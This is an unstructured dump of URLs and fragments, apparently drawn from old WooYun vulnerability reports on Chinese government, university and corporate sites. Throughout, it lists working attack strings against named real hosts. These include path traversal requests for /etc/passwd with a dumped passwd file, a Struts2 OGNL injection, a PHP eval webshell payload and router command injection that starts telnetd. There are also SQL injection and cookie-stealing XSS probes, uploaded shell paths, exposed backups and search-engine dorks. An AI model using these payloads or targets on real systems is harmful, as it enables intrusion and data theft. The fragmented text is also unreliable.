http://180.168.124.32:90/ http://180.168.124.150/eProcess/LoginNoAD.aspx http://180.168.124.150/eProcess/upfile/这里的文件查询,可以跨目录.,目录错误,会报出web路径 http://eben.e18.cc/web/web22/index.action http://www.ao-t.com/ http://xsc.nau.edu.cn/zs/nau-zs/Shownews.asp?id=537 http://www2.shisu.edu.cn/sisunews/show_news.php?id=6115 http://www.ctnma.cn/sysPwdQuestion!check.do "inurl:lcm.ynjy.cn"即可查到数据 http://www.ftsports.gov.cn/news.asp?news_id=852 http://news.cnhubu.com/webmanage/login.aspx http://member.517best.com/login.aspx http://www.tnwsj.gov.cn/shownewsinfo2.asp?news_id=280 http://www.zzsyzp.com/sydwzk/refer/refer.jsp?AreaID=1&DeptType=1&PublicFlag=2&FrequentFlag=2&TypeID=0&Keyword=%25%27+and+1%3D1+and+%27%25%27%3D%27&goNo=&ShowCountNo=10&ShowCount=10&totalNO=1 inurl:sydwzk/demand http://www.pudn.com/comment.asp?type_id=1010 http://yqdj.sheyang.gov.cn/admin/index.htm site:ttpod.com inurl:admin http://fm.admin.ttpod.com/ http://fm.admin.ttpod.com/a fm.admin.ttpod.com/releases/20140506095415/public/index.php http://www.aili.com.cn/aili.rar http://www.aili.com.cn/myadmin/index.php http://wooyun.org/bugs/wooyun-2014-060688 http://221.233.24.38 http://221.233.24.55/common/shell/ http://221.233.24.55/common/shell/BillBack.sh http://221.233.24.24/phpinfo.php http://221.233.24.38/manual/ http://221.233.24.38 http://www.sf-express.com/sf-service-web/service/billPicture/运单号/image?phone=运单上手机号码&lang=sc&region=cn http://rmsh.ccpph.com.cn/app/bookSearch.action http://rmsh.ccpph.com.cn/app/2.txt http://www.xbjcyc.cn/viewbbs.asp?id=109 http://makemoney.39.net/ http://itv.hb.vnet.cn/itv/ff/itv/hot.php?id=30 http://www.maxen.com.cn/plus/flink.php http://oa.hnu.cn/Home/Login https://pro.panasonic.cn/download.php?filename=./download.php http://dream.yiban.cn/new_detail.php?id=19 http://www.fjdpc.gov.cn/zfmllist.aspx?ctlgid=31314144 http://wooyun.org/bugs/wooyun-2014-058260 http://vpn.ycmd.com.cn/
http://v31.diyou.cc/transfer_success/index.html?keywords=1&borrow_type=&account_status=&borrow_interestrate=&spread_month= http://v31.diyou.cc/transfer_success/index.html http://sqlmap.sourceforge.net http://www.22shop.com http://www.22shop.com/mobile-Apple_iPad_Air.html http://www.22shop.com/mobile-6004.html http://newcar.xcar.com.cn/auto/index.php?r=Ajax/PsIndexDealer&pserid=192&province_id=30&city_id=347&_=1401781245246 http://www.fjaudit.gov.cn/zfndbg.aspx?p=1&ctlgid=88412874 http://www.fjaudit.gov.cn/zfgd.aspx?p=1&ctlgid=82583512 http://www.fjaudit.gov.cn/govMlTable.aspx?p=1&ctlgid=88632346,15788548,47786878,83527373,18562116,17714654 http://learn-document.googlecode.com/svn/trunk/Company/ICSON/Site.txt http://www.fjxwcbj.gov.cn/wsbsZn.aspx?ctlgid=756785 http://www.fjxwcbj.gov.cn/wsbsZn.aspx?p=1&ctlgid=756785 http://www.fjxwcbj.gov.cn/govGd.aspx?p=1&ctlgid=25854565 http://www.fjxwcbj.gov.cn/govBg.aspx?p=1&ctlgid=21252317 http://www.fjta.gov.cn/SystemManage/Vote/ShowVoteRate.aspx?AllQn=472&LanguageTypeID=0&Action=vote http://www.fjta.gov.cn/news/newslist-1-130.html?t=%5b%e9%87%87%e7%bc%96%5d http://www.universalresort.com.cn/dnews.asp?id=74 http://www.universalresort.com.cn/manage/index.asp http://www.fjjg.gov.cn/cms/cms/infopub/rss.jsp?channelcode=A1228&maxnum=20 http://qqypt.fsecity.com:8080/sc/login.action http://zwdt.tz.gov.cn/riseapprove_web/admin.jsp http://x.kuwo.cn/KuwoLive/GetTopGiftWeekList?uid=129683106 http://help.sundns.com/help/index.php?page=${@print%28eval%28$_POST[wooyu-ag]%29%29 http://120.197.95.82:8081/ringmanager/ums/user!login.action http://search.uzai.com/search/wordlink?q=g&ran=0.07143457215560722&searchCallBack=jsonpCallback&_=1402214741100 http://search.uzai.com/search/wordlink?q=g%2527&ran=0.07143457215560722&searchCallBack=jsonpCallback&_=1402214741100 http://search.uzai.com/search/wordlink?q=g%25%2527 http://search.uzai.com/search/wordlink?q=g%25%2527 http://www.banwoxingcar.com/news_show.asp?id=1367 
http://www.tuniu.com/main.php?do=online_book_visitor&order_id=3478187 http://www.fjjt.gov.cn:8000/guestbook/New_gb.asp?action=rep&gb_id=11 http://www.fjjt.gov.cn:8000/printpage.asp?ArticleID=5217 http://wanwan.sina.com.cn/thirdpartypapi/logingmae.php?gid=18001219&origin=3171&oid=1004102910003&wyx_user_id=xxxx&wyx_session_key=xxxxx&wyx_create=1402188440&wyx_expire=1402224440&wyx_signature=cf96579d64c57efef11bbaac05c6ad8339c5ad9c http://promotion.taobao.com/worldcup/actCommonLottery.do?回车,按住′ http://www.10658235.com:8080/webpos/login.jsp http://point.bjgwbn.net.cn/newsinfo.aspx?nid=78 intitle:ZDSoft城域综合信息平台 http://120.35.4.22:8080/cnet/student2/generalquery/archives/archivesfrm.jsp http://222.132.51.26:1949/cnet/student2/generalquery/archives/archivesfrm.jsp http://220.166.21.94:8080/cnet/student2/generalquery/archives/archivesfrm.jsp http://vod.ydxedu.com:81/cnet/student2/generalquery/archives/archivesfrm.jsp http://www.gyzqjy.com:8080/cnet/student2/generalquery/archives/archivesfrm.jsp http://118.122.51.66:8080/cnet/student2/generalquery/archives/archivesfrm.jsp http://gm.fsjy.cn:8080/cnet/student2/generalquery/archives/archivesfrm.jsp http://221.0.93.135/cnet/student2/generalquery/archives/archivesfrm.jsp http://oa.fsjyj.gov.cn:81/cnet/student2/generalquery/archives/archivesfrm.jsp http://211.86.89.229:9999/cnet/student2/generalquery/archives/archivesfrm.jsp http://61.153.240.147:8080/cnet/student2/generalquery/archives/archivesfrm.jsp http://120.35.4.22:8080/cnet/student2/generalquery/archives/archivesfrm.jsp http://oa.jdsam.com/ http://store.aion.sdo.com:9101/project/20140506/index.aspx?token= site:gov.cn inurl:wsyygh http://health.sxws.gov.cn/yypt/wsyygh/index.action,该系统存S2-16漏洞,利用如图, http://health.sxws.gov.cn/yypt/wooyun.txt http://h.133.cn/hotel/message/view?m=3xxxx http://h.133.cn/cr/message/upimages/1403311714283119_..2.jpg20140331170036.5518190440721.php_.html http://h.133.cn/cr/message/upimages/1403311712419434_..2.jpg20140331170036.5518190440721.php_.php 
http://pei.wzu.edu.cn/dSource.aspx?id=27 http://www.sqlmap.org http://w19374.sto.cn/news_detail.asp?id=101683 https://222.36.19.35/portal_default/index2.html site:nyxdns.com http://8ce7482cc890.nyxdns.com/doc/page/main.asp http://8ce74813dad8.nyxdns.com:92/doc/page/main.asp http://8ce7483f6886.nyxdns.com/doc/page/main.asp http://8ce748232147.nyxdns.com/doc/page/main.asp http://8ce7484d3bea.nyxdns.com/doc/page/main.asp http://8ce7482d087d.nyxdns.com:85/doc/page/main.asp http://8ce7482ccb7f.nyxdns.com:90/doc/page/main.asp http://8ce74855a6b9.nyxdns.com:91/doc/page/main.asp http://8ce74855a6b9.nyxdns.com:92/doc/page/main.asp http://8ce74851ac2e.nyxdns.com:90/doc/page/main.asp http://8ce7482a1a93.nyxdns.com:90/doc/page/main.asp http://8ce7483fbd48.nyxdns.com:91/doc/page/main.asp http://8ce74854e5aa.nyxdns.com/doc/page/main.asp http://graduate.ahnu.edu.cn/ http://graduate.ahnu.edu.cn/demo/中的帐号:200802020230 http://graduate.ahnu.edu.cn/StudentInfo/InSchool/index.jsp?xh=200802020235& http://192.168.1.1/diagnosis.asp http://192.168.1.1/goform/Diagnosis?system_command=命令 http://192.168.1.1/goform/Diagnosis?system_command= admin:jwEx7t/7fl0lY:0:0:Adminstrator:/:/bin/sh http://192.168.1.1/goform/Diagnosis?system_command=telnetd http://nc.zjsdxf.cn/login/ http://www.jinri.net.cn http://www.xaltzw.gov.cn/Json.aspx?type=itemsearch&sncode= http://ny.jxqx.net/login.php http://114.255.114.125:80 http://www.cce.swu.edu.cn/e2/admin1/admin.jsp http://www.cce.swu.edu.cn/e2/reg_over.jsp http://www.we7.cn/ http://gov.we7.cn/User/AccountEdit.aspx http://gov.we7.cn/_data/Uploads/bdf99a45-43e8-45ba-a417-7752117fff7b.aspx http://ir.361sport.com/html/print_page_index.php?file_name=../../../../../../../../../../etc/passwd http://ir.361sport.com/s/print_page_index.php?file_name=../../../../../../../../../../etc/passwd http://ir.361sport.com/c/print_page_index.php?file_name=../../../../../../../../../../etc/passwd http://bkzs.tongji.edu.cn/?classid=3478&id=38&t=show 
http://61.178.82.54:9090/zjgl/publicQueryCard.action http://unep-iesd.tongji.edu.cn/?classid=894&action=video&id=2&t=show http://unep-iesd.tongji.edu.cn/?classid=894&action=video&id=2&t=show http://baowei.tongji.edu.cn/?classid=126&action=video&id=16&t=show http://baowei.tongji.edu.cn/?classid=126&action=video&id=16&t=show http://116.228.73.38:8080/twm/loginAction!init.action http://jgdw.tongji.edu.cn/Index.php?r=guest/block&id=1 http://rsks.qdhrss.gov.cn/dongtaiContent.aspx?id=875 http://railway.tongji.edu.cn/cn/aboutus.asp?id=25 http://222.66.39.212:8081/rims/login!.action http://222.66.39.212:8081/rims/login!.action http://cad.tongji.edu.cn/cad/noticedetail.aspx?id=17 http://cad.tongji.edu.cn/cad/newslist.aspx?id=42 http://cad.tongji.edu.cn/cad/project_detail.aspx?id=16 http://cad.tongji.edu.cn/cad/staff_detail.aspx?id=9 http://dgyj.tongji.edu.cn/contentUs.aspx?cuid=1 http://dgyj.tongji.edu.cn/NewsDetalied.aspx?nid=205 http://www.wxsfj.gov.cn/plus/flink.php www.iflytek.com。 http://www.wooyun.org/searchbug.php?q=DNS%E5%9F%9F%E4%BC%A0%E9%80%81 http://www.ahgcc.cn/siteserver/ http://www.ahgcc.cn/sitefiles/temporaryfiles/contents/iis.aspx http://www.ahgcc.cn site:googlecode.com intext:baidu.com http://www.yanjing.com.cn/ConTent.asp?MainId=3&BigClassid=1 http://www.voicecloud.cn:28017/ http://www.careland.com.cn/ht/Manage/Left.php http://jwy.whcm.edu.cn/chafen7/manager/_vti_cnf/st_right.asp?Action=MainMenu http://home.focus.cn/group/switch.php?v_poll_id=6913&group_id=1632&v_login_id=22741128&submit=%B5%B1%C7%B0%BD%E1%B9%FB http://zcc.tongji.edu.cn/?.pa=aT1QMTkwOTQzJnQ9YSZzPW1heGltaXplZCZtPXZpZXc%3D&act=info&id=2 http://cs.tju.edu.cn/iceccs/isise/manager/managerLogin.action Getshell:http://cs.tju.edu.cn/iceccs/isise/guige.jsp http://tide.iqiyi.com/WebResource.axd?d=XMQ9NVUp8W3Nas4YbO6SLg2 http://tide.iqiyi.com/ScriptResource.axd https://github.com/youkugems/m-cms-for-tudou-tv/blob/4d2093ed698c94b25d71e1eb50521a9fffd836d5/config/settings.yml.example 
https://github.com/youkugems/m-cms-for-tudou-tv/blob/4d2093ed698c94b25d71e1eb50521a9fffd836d5/config/deploy.rb http://www.hequ.gov.cn/hequ/manager/ http://www.youyax.com/404/shell.php http://demo.acsoft.com.cn/DownLoadPage.aspx?FileName=/web.config http://demo.51able.com/DownLoadPage.aspx?FileName=/web.config http://jeaie.ec.js.edu.cn/Question.aspx?act=q http://jeaie.ec.js.edu.cn/Question.aspx?qNo=425&act=q http://jeaie.ec.js.edu.cn/Question.aspx?act=q&qNo=425 http://jeaie.ec.js.edu.cn/AmericanCollege/Common.aspx?TypeNo=53&NewsType=-505 http://jeaie.ec.js.edu.cn/AmericanCollege/Common.aspx?NewsType=-201 http://jeaie.ec.js.edu.cn/Question.aspx?act=q&qNo=425 http://jeaie.ec.js.edu.cn/ShowNews.aspx?NewsType=2&NewsNo=1577 http://jeaie.ec.js.edu.cn/AmericanCollege/XiangMu.aspx?NewsType=-203 http://jeaie.ec.js.edu.cn/AmericanCollege/QuestionList.aspx?NewsType=-2 http://www.rongtian.com.cn/ http://gs.tju.edu.cn/xw/readnews.asp?NewsID=271 http://gs.tju.edu.cn/xw/Listfile.asp?ClassID=18 http://gs.tju.edu.cn/yjspy/py2013/kc_list.asp?xydm=117 http://gs.tju.edu.cn/xw/mvpsubjs.asp?id=2 http://gs.tju.edu.cn/xw/ListNews.asp?ClassID=30 http://www.7xfilm.com/web/xinxi/xinxi.php?id=1444 http://www.7xfilm.com/web/yxxx/yxxx_show.php?id=687 http://www.7xfilm.com/web/phzx/phzx.php?id=231 http://www.7xfilm.com/web/zxly/list.php http://www.foowu365.com/page/html/company.php?id=1 http://www.foowu365.com/page/html/company.php?id=1 http://www.ip138.com/www.rar http://222.18.15.131/zhaosheng/services/ http://222.18.15.131/zhaosheng/services/ysssjxg.php http://222.18.15.131/zhaosheng/services/2012zzzs.phpv http://ad.easou.com/admin/newsNoticeShowById.admin?id=1 http://www.wxcgzx.com/weboffice/ http://bbs.fumu.com/tj/admin.php http://www.joyoung.com/cgi-bin/test-cgi/* http://www.joyoung.com/index.jsp http://kf.joyoung.com/发现其Apache版本是2.2.17就想到了CVE-2012-0053然后验证了下确实存在此漏洞能读取http-only保护的cookies http://www.361sport.com/index.php?a=index&sell=1&m=product&groupby=1&size=35 http://officeimg.focus.cn/ 
http://www.shanting.gov.cn/jcms/m_5_7/replace/opr_importinfo.jsp?fn_billstatus=1 http://tuoshan.yzwh.gov.cn/jcms/m_5_7/replace/opr_importinfo.jsp?fn_billstatus=1 http://kf.joyoung.com/search.html http://116.236.150.104/masLoginLogicAction/login.action http://116.236.150.104/masLoginLogicAction/login.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://60.29.37.234:9090/ http://battery.tcl.com/read_products.php?smname=MP3/MP4%CF%B5%C1%D0 http://www.bankrate.com.cn/jumpurl/aHR0cDovL3d3dy53b295dW4ub3JnL2luZGV4LnBocA== http://www.wooyun.org/index.php inurl:OnlineQuery/QueryList.aspx http://149.126.86.39/#newwindow=1&q=inurl:OnlineQuery/QueryList.aspx&start=20 http://www.whsfzb.gov.cn/OnlineQuery/QueryList.aspx http://www.ytshenpi.cn/OnlineQuery/QueryList.aspx http://www.rcsp.cn/OnlineQuery/QueryList.aspx http://www.lcxzfw.gov.cn/OnlineQuery/QueryList.aspx http://www.xtsxzfw.gov.cn/OnlineQuery/QueryList.aspx http://www.qjxzsp.com/langchao.ecgap.outportal/OnlineQuery/QueryList.aspx http://www.wdaac.cn/OnlineQuery/QueryList.aspx http://www.sdsp.cn/OnlineQuery/QueryList.aspx http://www.shspzx.gov.cn/OnlineQuery/QueryList.aspx http://222.135.78.34:8089/OnlineQuery/QueryList.aspx http://www.dftzfw.cn/waiwang/OnlineQuery/QueryList.aspx http://shenpi.xuchang.gov.cn/OnlineQuery/QueryList.aspx http://www.hdamo.gov.cn/OnlineQuery/QueryList.aspx http://221.176.217.34/szrx/OnlineQuery/QueryList.aspx http://www.e.lfang.gov.cn/OnlineQuery/QueryList.aspx http://xzsp.jianggan.gov.cn:8080/OnlineQuery/QueryList.aspx http://zmdxzfw.gov.cn/OnlineQuery/QueryList.aspx 
http://shenpi.changge.gov.cn/OnlineQuery/QueryList.aspx http://www.whsfzb.gov.cn/OnlineQuery/QueryList.aspx http://www.wdaac.cn/OnlineQuery/QueryList.aspx http://221.176.217.34/szrx/OnlineQuery/QueryList.aspx http://www.shspzx.gov.cn/OnlineQuery/QueryList.aspx http://oa.juneyaoair.com http://dmbz.juneyaoair.com/weboa/webpage.nsf/webpage?OpenForm http://111.205.51.12:8080/wcm/app/login.jsp www.site.com.wygkcn_AllUser.asp http://bm.xmu.edu.cn/wygkcn_AllUser.asp http://219.146.3.113/front/indexlogin.action http://219.146.3.113/front/indexlogin.action http://202.102.41.37:8080/login/login.do http://202.102.41.37:8080/login/login.do http://202.102.41.159/robot/check-login.action http://202.102.41.159/robot/check-login.action http://202.102.41.160/robot/check-login.action http://202.102.41.160/robot/check-login.action http://csldata.sports.sohu.com/admin.zip http://csldata.sports.sohu.com/backup.zip http://220.181.90.31/sql.rar http://220.181.90.31/www.rar http://jxkh.gtja.com/nxl.asp?article_O6QK1 http://www.panxian.gov.cn/jcms/workflow/design/que_model.jsp?userid= http://www.changde.gov.cn/jcms/workflow/design/que_model.jsp?userid= http://www.cshtz.gov.cn/jcms/workflow/design/que_model.jsp http://tuoshan.yzwh.gov.cn/jcms/workflow/design/que_model.jsp http://www.panxian.gov.cn/jcms/workflow/design/que_model.jsp?userid=&que_keywords=%E4%B8%80&que_keywords1=%E4%B8%80&que_classid=&que_classname=&b_valid=&starttime=&endtime=&sortorder=&sortnum=-1 https://github.com/wujiajun/juzhai-static/blob/e9ede9094a69a38feea6499272034e5078d3f64d/static/build.property.xml http://192.168.3.197:8080/karaoke/index.html"/ http://192.168.3.220:8090/karaoke/index.html"/ http://192.168.3.161:8080/karaoke/index.html"/ www1.server www1.username www1.password www1.port www1.javahome www1.user.dir www1.username}"/ www1.tomcat.dir www1.tomcat.webapps.dir www1.tomcat.dir}/webapps"/ www2.server www2.username www2.password www2.port www2.javahome www2.user.dir www2.username}"/ www2.tomcat.dir 
www2.tomcat.webapps.dir www2.tomcat.dir}/webapps"/ svn://server12/zdjt/globe/documents/NetProtocol/ProtocolForJava.xsd"/ https://github.com/alvayang/tinytools/blob/f4a9bcafb22dfc3188f143e011b85109e3140a9a/py/report_my_ip.py https://github.com/jadeball/tianxiawuai/blob/39abedfe6df07dbf5cb76343bc3973b8ab6b9b37/config.js http://loglyer.blog.163.com/ http://61.161.156.71/ http://sparepart.dfac.com/zecmd/zecmd.jsp http://www.xsmlr.gov.cn/MainPage.aspx?_Ascx=/Data/Layout/Page/2/UserForgetPassword.ascx&_CM=0&_CT=600&_M0=5&_MenuID=33489&_Part=1&_PFD=0&_SID=WebSite http://www.xsmlr.gov.cn/MainPage.aspx?_Ascx=/Data/Layout/Page/2/UserForgetPassword.ascx&_CM=0&_CT=600&_M0=5&_MenuID=33489&_Part=1&_PFD=0&_SID=WebSite http://www.hsgt.gov.cn/MainPage.aspx?Mode=more&P_InfoPath=/%e5%85%ac%e5%85%b1%e4%bf%a1%e6%81%af%e5%ba%93/%e5%9b%bd%e5%9c%9f%e4%b8%9a%e5%8a%a1/%e5%9c%9f%e5%9c%b0%e4%be%9b%e5%ba%94/%e5%8d%8f%e8%ae%ae%e5%87%ba%e8%ae%a9%e6%84%8f%e5%90%91%e5%85%ac%e5%91%8a/&P_Title=%e6%8b%9b%e6%8b%8d%e6%8c%82%e7%bb%93%e6%9e%9c&_Ascx=/OA/PersonalWork/InfoBase/InfoPublish/InfoListPartPage.ascx&_CM=2&_CT=600&_MenuID=0&_Part=1&_PFD=2518&_SID=WebSite www.wxxqmlr.gov.cn/MainPage.aspx?_Ascx=/OA/PersonalWork/InfoBase/UserRegister/UserForgetPassword.ascx&_CM=0&_CT=600&_MenuID=0&_Part=1&_PFD=1549&_SID=WebSite www.wxxqmlr.gov.cn/MainPage.aspx?_Ascx=/OA/PersonalWork/InfoBase/UserRegister/UserForgetPassword.ascx&_CM=0&_CT=600&_MenuID=0&_Part=1&_PFD=1549&_SID=WebSite http://www.hsibi.gov.cn/MainPage.aspx?Mode=more&P_InfoPath=/%e5%85%ac%e5%85%b1%e4%bf%a1%e6%81%af%e5%ba%93/%e9%a6%96%e9%a1%b5/%e5%91%a8%e8%be%b9%e5%8a%a8%e6%80%81/&P_Title=%e4%bf%a1%e6%81%af%e5%88%97%e8%a1%a8&_Ascx=/OA/PersonalWork/InfoBase/InfoPublish/InfoListPartPage.ascx&_CM=0&_CT=600&_MenuID=0&_Part=1&_PFD=1613&_SID=WebSite http://ca.wxgtfj.cn/MainPage.aspx?WebPageID=88624&_SID=WebSite http://ca.wxgtfj.cn/MainPage.aspx?WebPageID=88624&_SID=WebSite 
http://yangshan.huishan.gov.cn/MainPage.aspx?WebPageID=580&_M0=2&_M1=2&_MenuID=33571&_SID=WebSite http://yangshan.huishan.gov.cn/MainPage.aspx?WebPageID=580&_M0=2&_M1=2&_MenuID=33571&_SID=WebSite http://bt.wxgtfj.cn/MainPage.aspx?Mode=more&_Ascx=/OA/Test/PersonTest/VoteHisSearch.ascx&_CM=0&_CT=600&_MenuID=0&_Part=1&_PFD=186964&_SID=WebSite http://bt.wxgtfj.cn/MainPage.aspx?Mode=more&_Ascx=/OA/Test/PersonTest/VoteHisSearch.ascx&_CM=0&_CT=600&_MenuID=0&_Part=1&_PFD=186964&_SID=WebSite http://nc.wxgtfj.cn/MainPage.aspx?Mode=more&_Ascx=/OA/Test/PersonTest/VoteHisSearch.ascx&_CM=0&_CT=600&_MenuID=0&_Part=1&_PFD=186595&_SID=WebSite http://nc.wxgtfj.cn/MainPage.aspx?Mode=more&_Ascx=/OA/Test/PersonTest/VoteHisSearch.ascx&_CM=0&_CT=600&_MenuID=0&_Part=1&_PFD=186595&_SID=WebSite http://dfi.bnuz.edu.cn/teacher.php?teacherid=42&pageid=2 ftp://115.28.45.48。里面有一个文档ftp://115.28.45.48/pub/11.txt http://mail.tass.com.cn/ http://nihao.net/ http://mail.iapppay.com/webmail/login9.php http://support.chanjet.com:9090/ http://office.focus.cn/office/kfs_info.php?kfs_id=1072 http://116.213.70.99/ http://brand.kimiss.com/all.html?keyword=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Submit2=%CB%D1%CB%F7 http://124.65.49.12/filsys/security/login.action http://v5.pc.duomi.com/share-share_api-profile?uid=3942052 www.100.com http://i.100.com/profile https://b2b.ccb.cn:1025/NCCB/B2BFileIBSContentServlet?fileName=../../../../../../../../../../../../../../../../etc/passwd&branchId=999999001&language=CN&ibsReqType=2 http://203.208.46.145/#filter=0&newwindow=1&q=%E8%BD%AF%E4%BB%B6%E9%80%9A-%E4%B8%AD%E6%96%B0%E9%87%91%E6%A1%A5+inurl:softwarer&start=40 http://210.41.233.137/softwarer/bbs/upload.asp http://www.zzyb.org/fckeditor/editor/filemanager/browser/default/browser.html?Type=&Connector=connectors/jsp/connector http://123.126.32.82:8080/script http://202.103.49.226/ http://www.hfjs.gov.cn/searchCenter/compBaseInfo.jsp?item_id=0701&comp_id=A08009101417613178 
http://v.baidu.com/v?word=xxx&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800 http://v.baidu.com/v?word=xxx&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800#pn=0&old=&ty=0&nf=0&cl=0&du=1&pd=0&sc=0&order=0 http://q.letv.com/ http://uu.chanjet.com/ http://uu.chanjet.com/login.aspx http://go.sohu.com/2013/innovator/geren.php?userid=16852 http://svn.go.sohu.com/pmis/factory/sandbox//2013/innovator/geren.php?userid=16852 http://125.69.85.194/login.php,邮件系统,用户名是不能输入一些特殊字符的,但是我们可以抓包在包里面进行修改,构造,比如,用户名用admin'去测试。 www.bjbus.com:80 www.bjbus.com http://www.sdutcm.edu.cn:80/news/news/manage http://www.bjsgsl.gov.cn/newshow.php?id=372 http://www.xgfgw.gov.cn/shownews.php?id=187 http://www.luolong.gov.cn/xiangzhen.php?id=999 http://www.hequ.gov.cn/hequ/templet/display.php?id=80 http://wap.17wo.cn/ http://wap.17.wo.com.cn/ http://wap.17.wo.com.cn/ForgetPassword!setPwd.action http://wap.17.wo.com.cn/Login!process.action http://wap.17wo.cn/ForgetPassword.action http://www.ahszkj.gov.cn/content/view.php?id=202如图: talks.jyb.cn/admin/.svn/entries http://cloud.dlink.com.cn/solutionsInfo.aspx?type=Cloud%20Camera&id=74 http://www.jia.com/citylist/search.php?callback=?&search_name=1 http://www.wooyun.org/bugs/wooyun-2014-060957 http://202.100.98.122/note/note_ucon.jsp jdbc:postgresql://127.0.0.1:5432/yinchuan http://www.chinauto.gov.cn/article_dtl.php?id=5411 http://www.qhsw.gov.cn/thread_2.php?id=1 http://rczx.seu.edu.cn/ddrc/show.asp?id=85 http://rczx.seu.edu.cn/qzdl/grjs.asp?gr=qizhao.ao inurl:student_info1.aspx http://202.203.225.17:8080/gmis/cjgl/apyjhlrcj.aspx inurl:student_info1.aspx http://ncrl.seu.edu.cn/NewsInfo.asp?ID=148 http://www.view.sdu.edu.cn/phpMyAdmin/ http://www.cjlu.edu.cn/cjlunew/NewsDetail.php?I=10436 http://filedown.bgpc.gov.cn:83/KCYG_POPEDOM/afterLogin/findNoReadBulletin.action http://hy.bgpc.gov.cn:82/MEETING_2009/userlogin/toUrl.action http://school.xjszxy.cn/ http://wlmqschool.xjszxy.cn/# http://wlmqschool.xjszxy.cn/#
http://jy.seu.edu.cn/detach.portal?.f=pe2308&.pmn=view&action=bulletinsMoreView&.ia=false&.pen=pe2308&groupid= http://magazine.tcl.com/en/manager/login.aspx?ReturnUrl=%2fen%2fmanager%2fDefault.aspx http://pgzx.zafu.edu.cn/a.aspx http://tmjy.zafu.edu.cn/admin/admin.asp http://lxy.zafu.edu.cn/ http://pgzx.zafu.edu.cn/eWebEditorExt/admin/login.aspx http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.**/login.asp http://**.**.** http://61.136.204.41:8080/edu/login!checkLogin.action http://www.tudou.com/programs/view/gh7jvNA-1JM/ http://yuanxian.letv.com/letv/net/checkLogin.jsp?callback=xxx http://zs.njupt.edu.cn/phpMyAdmin/index.php http://zs.njupt.edu.cn/html/Index/article/id/239。 http://zs.njupt.edu.cn/wel/Public/login www.esinidc.com http://xsc.njupt.edu.cn/ http://www.tl-hh.cn/note/note_login.jsp http://tl-wangtong.cn/note/note_login.jsp http://202.100.98.122/note/note_login.jsp http://58.18.184.26/note/note_login.jsp http://www.tl-hh.cn/note/note_login.jsp http://www.tl-hh.cn/note/note_leaword.jsp http://www.tl-hh.cn/note/note_browse.jsp http://www.tl-hh.cn/note/note_leaword.jsp http://210.14.147.254/page/user/admin/profile http://dir.minigame.qq.com/cgi-bin/yxs/GetYxsRegTime?callback=callback&dstuin= http://wooyun.org/bugs/wooyun-2014-060957 http://tl-wangtong.cn/cardload.jsp?filename=../../../../../../../../../../etc/passwd&maininfo_id=855 http://web18818.5udns.cn//cardload.jsp?filename=../../../../../../../../../../etc/passwd&maininfo_id=855 http://www.tl-dianxin.cn/cardload.jsp?filename=../../../../../../../../../../etc/passwd&maininfo_id=855 http://www.tl-hh.cn/cardload.jsp?filename=../../../../../../../../../../etc/passwd&maininfo_id=855
http://58.18.184.26/cardload.jsp?filename=../../../../../../../../../../etc/passwd&maininfo_id=855 http://www.tl-lanzhou.cn/cardload.jsp?filename=../../../../../../../../../../etc/passwd&maininfo_id=855 http://202.100.98.122/cardload.jsp?filename=../../../../../../../../../../etc/passwd&maininfo_id=855 http://1.180.181.126/cardload.jsp?filename=../../../../../../../../../../etc/passwd&maininfo_id=855 http://202.100.85.25/cardload.jsp?filename=../../../../../../../../../../etc/passwd&maininfo_id=855 http://tl-wangtong.cn/cardload.jsp?filename=../../../../../../../../../../etc/passwd&maininfo_id=855 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh http://182.131.21.138/swordcms/publish/default/static/main/index.htm http://zone.wooyun.org/index.php?do=publish&act=comment&fun=ajax&id=XX http://zone.wooyun.org/index.php?do=publish&act=comment&fun=ajax&id=XX http://www.smpx.com.cn/sz/article/ArticleShow.asp?ArticleID=2445 http://rdm.iflytek.com:2000 http://rdm.iflytek.com:6888/admin http://www.fxtiyu.com/do.php?inajax=1&do=spec&ac=article_count&parameter=1 http://corporateandinvestment.standardbank.co.za/forexWebsite/bak.jsp http://3g.club.xywy.com,没做任何验证,修改cookie中id值刷新就登入了(还是拿健康之家管理员帐号做测试吧) http://www.cjlu.edu.cn/cjlunew/NewsList.php?S= http://www.cjlu.edu.cn/cjlunew/NewsDetail.php?I= http://www.cjlu.edu.cn/cjlunew/Search.php?K= http://www.cjlu.edu.cn/cjlunew/Search.php?K=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
